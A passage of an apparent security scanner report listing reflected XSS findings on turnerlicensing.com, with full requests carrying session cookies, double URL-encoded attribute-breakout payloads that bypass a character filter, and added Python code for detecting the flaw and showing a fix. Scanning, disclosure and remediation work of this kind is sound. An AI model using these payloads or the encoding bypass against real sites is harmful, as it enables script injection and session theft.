The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /desk_calendars?6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:28 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2001985876:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=978
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100232


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Desk Calendars</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=338397&6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4=1&6de83'style='x:expression(alert(1))'5840fdf7ac4=1&fromsla=T&6de83%27style%3d%27x%3aexpression%28alert%281%29%29%275840fdf7ac4=1'>
...[SNIP]...

2.177. http://www.turnerlicensing.com/home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6ece'style='x:expression(alert(1))'0391ff654b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to older versions of Internet Explorer (IE7 and earlier, or later versions rendering in compatibility mode) and will not run in other browsers; the attribute breakout itself, the single quote that closes the attribute value, is not browser-specific, only the payload chosen to exploit it is.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /home?b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:50:58 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:50:58 GMT
NS_RTIMER_COMPOSITE: 1114175657:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=997
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 41742


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Homepage - Turner</title>


<meta name="robots" content="NOODP,NOYDIR">
<script language='JavaScript'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=1&b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2=1&fromsla=T&b6ece'style='x:expression(alert(1))'0391ff654b2=1&b6ece%27style%3d%27x%3aexpression%28alert%281%29%29%270391ff654b2=1'>
...[SNIP]...

2.178. http://www.turnerlicensing.com/magnetic_to-do_notes [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /magnetic_to-do_notes

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea298'style='x:expression(alert(1))'3a5ce7edc7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to older versions of Internet Explorer (IE7 and earlier, or later versions rendering in compatibility mode) and will not run in other browsers; the attribute breakout itself, the single quote that closes the attribute value, is not browser-specific, only the payload chosen to exploit it is.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /magnetic_to-do_notes?ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -811349489:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=800
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100729


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Magnetic To-Do Notes</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=262182&ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c=1&ea298'style='x:expression(alert(1))'3a5ce7edc7c=1&fromsla=T&ea298%27style%3d%27x%3aexpression%28alert%281%29%29%273a5ce7edc7c=1'>
...[SNIP]...

2.179. http://www.turnerlicensing.com/memo_books [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /memo_books

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70115'style='x:expression(alert(1))'e817eec67bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to older versions of Internet Explorer (IE7 and earlier, or later versions rendering in compatibility mode) and will not run in other browsers; the attribute breakout itself, the single quote that closes the attribute value, is not browser-specific, only the payload chosen to exploit it is.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /memo_books?70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:32 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -811347759:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=894
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100245


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Memo Books</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
erlicensing.com/s.nl?category=175951&70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd=1&fromsla=T&70115%27style%3d%27x%3aexpression%28alert%281%29%29%27e817eec67bd=1&70115'style='x:expression(alert(1))'e817eec67bd=1'>
...[SNIP]...

2.180. http://www.turnerlicensing.com/nondated_combo_packs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /nondated_combo_packs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1120'style='x:expression(alert(1))'8f5f8e675c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to older versions of Internet Explorer (IE7 and earlier, or later versions rendering in compatibility mode) and will not run in other browsers; the attribute breakout itself, the single quote that closes the attribute value, is not browser-specific, only the payload chosen to exploit it is.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /nondated_combo_packs?d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:35 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 778540437:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=822
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100037


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Nondated Combo Packs</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175958&d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5=1&fromsla=T&d1120'style='x:expression(alert(1))'8f5f8e675c5=1&d1120%27style%3d%27x%3aexpression%28alert%281%29%29%278f5f8e675c5=1'>
...[SNIP]...

2.181. http://www.turnerlicensing.com/paper_and_desk_caddy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /paper_and_desk_caddy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 524ea'style='x:expression(alert(1))'08e0d4230be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to older versions of Internet Explorer (IE7 and earlier, or later versions rendering in compatibility mode) and will not run in other browsers; the attribute breakout itself, the single quote that closes the attribute value, is not browser-specific, only the payload chosen to exploit it is.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
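The turnerlicensing.com entries in this section (the /Turner-Contact-Us finding above and 2.172 through 2.181) are the same flaw at different paths, so one added example covers all of them; it is not part of the original report or the scanner's code. It takes the hidden-input tag captured in the response for issue 2.173 (/book_covers) as its sample body, checks which of the three encodings of the canary came back, and then splits the tag into attributes the way a tolerant browser does, which is what turns the echoed quote into an injected style attribute. The function names and the attribute tokenizer are assumptions of this example.

```python
import re
from urllib.parse import quote

# Added example, not the scanner's own code.  SAMPLE_TAG is the hidden-input
# line captured in the response for issue 2.173; CANARY is the raw (fully
# decoded) form of that issue's payload.
CANARY = "c755e'style='x:expression(alert(1))'f5f16d43fab"
SAMPLE_TAG = (
    "<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl"
    "?category=175964&c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529"
    "%2529%2527f5f16d43fab=1&c755e'style='x:expression(alert(1))'f5f16d43fab=1"
    "&c755e%27style%3d%27x%3aexpression%28alert%281%29%29%27f5f16d43fab=1&fromsla=T'>"
)


def encodings(raw: str) -> dict:
    """The three forms one response can carry: raw, URL-encoded once and
    URL-encoded twice.  safe='' makes quote() encode ' ( ) : = as well."""
    once = quote(raw, safe="")
    return {"raw": raw, "single": once, "double": quote(once, safe="")}


def reflections(body: str, raw: str) -> dict:
    """Which encodings of the canary appear in the body.  Compared
    case-insensitively: the server emits lowercase hex (%3d), quote()
    emits uppercase (%3D)."""
    low = body.lower()
    return {form: text.lower() in low for form, text in encodings(raw).items()}


# Attribute tokenizer modelled on tolerant browser parsing (an assumption of
# this example): a quoted value ends at the next matching quote, a bare value
# at whitespace or '>'.
_TAG_NAME = re.compile(r"<\s*([A-Za-z][\w-]*)")
_ATTR = re.compile(r"([\w:-]+)\s*=\s*(?:'([^']*)'|\"([^\"]*)\"|([^\s>]+))")


def parsed_attributes(tag: str) -> dict:
    """Split a start tag into name -> value as a browser would see it."""
    head = _TAG_NAME.match(tag)
    if head is None:
        raise ValueError("not a start tag")
    attrs = {}
    for m in _ATTR.finditer(tag, head.end()):
        name, sq, dq, bare = m.groups()
        attrs[name] = sq if sq is not None else dq if dq is not None else bare
    return attrs


def breaks_out(tag: str, raw: str) -> bool:
    """True when the raw echo is present but not wholly inside any single
    attribute value: the quote in the payload closed the attribute early and
    the remainder was read as new attributes (here, style=...)."""
    if raw not in tag:
        return False
    return not any(raw in value for value in parsed_attributes(tag).values())


if __name__ == "__main__":
    print(reflections(SAMPLE_TAG, CANARY))
    for name, value in parsed_attributes(SAMPLE_TAG).items():
        print(f"{name:>12} = {value}")
    print("attribute breakout:", breaks_out(SAMPLE_TAG, CANARY))
```

breaks_out() deliberately does not look for the word style: it reports a breakout whenever the raw echo straddles more than one parsed attribute, so it stays correct for a payload that injects a different attribute, and it returns False both when the echo is HTML-encoded (raw form absent) and when it sits harmlessly inside a double-quoted value.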

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
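The remediation above applies equally to every turnerlicensing.com entry in this section, so the model below is added once, here, as an illustration that is not the application's code. It contains a minimal handler with the reported defect (a blocklist check on the once-decoded parameter name, then a second URL-decode, then the name written into a single-quoted attribute) beside a corrected handler that drops the second decode and HTML-encodes the attribute on output. BLOCKED, the builder function names and the /s.nl referer layout are assumptions; the payloads are the ones from the entry above.

```python
from html import escape
from urllib.parse import parse_qsl, unquote

# Added example modelling the flaw and the fix; not the application's code.
# BLOCKED, the build_referer_* functions and the referer layout are assumed.
BLOCKED = frozenset("<>\"'")  # characters the filter rejects (assumed)
BASE = "http://www.turnerlicensing.com/s.nl?"

# Payloads from the entry above: once the web server has decoded the first,
# it is byte-for-byte the second; decoding the second yields the raw quote.
DOUBLE_ENCODED = ("6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529"
                  "%2529%25277f7d614df6b=1")
SINGLE_ENCODED = "6dd9c%27style%3d%27x%3aexpression%28alert%281%29%29%277f7d614df6b=1"


def from_web_server(raw_query: str) -> list:
    """The single URL-decode the web server performs before the application
    sees the query: %2527 arrives as %27, %27 arrives as '."""
    return parse_qsl(raw_query, keep_blank_values=True)


def validate(name: str) -> None:
    if BLOCKED & set(name):
        raise ValueError(f"rejected parameter name: {name!r}")


def build_referer_vulnerable(raw_query: str) -> str:
    """Validates the once-decoded name, then decodes it again and writes it
    into a single-quoted attribute with no output encoding."""
    parts = []
    for name, value in from_web_server(raw_query):
        validate(name)           # runs before canonicalisation is finished
        name = unquote(name)     # the unnecessary second decode
        parts.append(f"{name}={value}")
    url = BASE + "&".join(parts)
    return f"<input type='hidden' name='referer' value='{url}'>"


def build_referer_fixed(raw_query: str, validate_names: bool = True) -> str:
    """No second decode, so the form that is validated is the form that is
    emitted; the URL is HTML-attribute-encoded on output so a quote can never
    close the value.  validate_names=False shows that the encoding alone is
    sufficient, with the blocklist as defence in depth."""
    parts = []
    for name, value in from_web_server(raw_query):
        if validate_names:
            validate(name)
        parts.append(f"{name}={value}")
    url = escape(BASE + "&".join(parts), quote=True)  # ' -> &#x27;  & -> &amp;
    return f"<input type='hidden' name='referer' value='{url}'>"


def is_rejected(builder, raw_query: str) -> bool:
    """True when the builder refuses the query instead of rendering it."""
    try:
        builder(raw_query)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", build_referer_vulnerable(DOUBLE_ENCODED))
    print("fixed:     ", build_referer_fixed(DOUBLE_ENCODED))
    print("fixed, no filter:", build_referer_fixed(SINGLE_ENCODED, validate_names=False))
```

The vulnerable builder rejects the single-encoded payload (the server's decode exposes the quote to the filter) yet renders the double-encoded one with a live quote, exactly the bypass the report describes. The fixed builder emits the double-encoded payload as inert %27 sequences, and even with the filter switched off the raw quote reaches the page only as &#x27;.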

Request

GET /paper_and_desk_caddy?524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:32 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 226384085:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=875
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 76479


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Paper & Desk Caddy</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175960&524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be=1&524ea'style='x:expression(alert(1))'08e0d4230be=1&524ea%27style%3d%27x%3aexpression%28alert%281%29%29%2708e0d4230be=1&fromsla=T'>
...[SNIP]...

2.182. http://www.turnerlicensing.com/paper_cubes [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /paper_cubes

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b6f7'style='x:expression(alert(1))'57f8f7591a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /paper_cubes?1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:40 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2034792773:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=894
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100156


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Paper Cubes</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script
...[SNIP]...
erlicensing.com/s.nl?category=175961&1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8=1&1b6f7%27style%3d%27x%3aexpression%28alert%281%29%29%2757f8f7591a8=1&fromsla=T&1b6f7'style='x:expression(alert(1))'57f8f7591a8=1'>
...[SNIP]...

2.183. http://www.turnerlicensing.com/portfolios [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /portfolios

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f0f7'style='x:expression(alert(1))'b5a9e77cfd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /portfolios?2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:41 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 778542058:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=943
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100187


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Portfolios</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175962&2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5=1&fromsla=T&2f0f7'style='x:expression(alert(1))'b5a9e77cfd5=1&2f0f7%27style%3d%27x%3aexpression%28alert%281%29%29%27b5a9e77cfd5=1'>
...[SNIP]...

2.184. http://www.turnerlicensing.com/teams_by_state/Alabama [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Alabama

Issue detail

